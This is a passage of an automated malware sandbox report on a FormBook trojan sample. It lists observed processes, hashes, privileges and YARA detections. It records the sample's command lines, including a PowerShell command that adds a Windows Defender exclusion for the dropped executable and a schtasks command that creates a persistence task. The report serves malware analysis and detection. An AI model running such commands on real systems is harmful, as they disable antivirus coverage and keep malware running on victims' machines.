                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:3
                                                          Start time:10:41:56
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe"
                                                          Imagebase:0x180000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          Target ID:4
                                                          Start time:10:41:56
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7c72c0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:5
                                                          Start time:10:41:56
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp"
                                                          Imagebase:0xd20000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:6
                                                          Start time:10:41:57
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7c72c0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:7
                                                          Start time:10:41:59
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Imagebase:0x8a0000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 29%, ReversingLabs

                                                          Target ID:9
                                                          Start time:10:42:06
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Imagebase:0xe40000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          Target ID:10
                                                          Start time:10:42:16
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp"
                                                          Imagebase:0xd20000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:11
                                                          Start time:10:42:16
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7c72c0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:12
                                                          Start time:10:42:17
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Imagebase:0x70000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:13
                                                          Start time:10:42:17
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Imagebase:0x7ff6992e0000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.501723041.0000000001870000.00000040.10000000.00040000.00000000.sdmp, Author: unknown

                                                          Target ID:14
                                                          Start time:10:42:23
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff618f60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          Target ID:17
                                                          Start time:10:43:12
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                          Imagebase:0xd90000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          No disassembly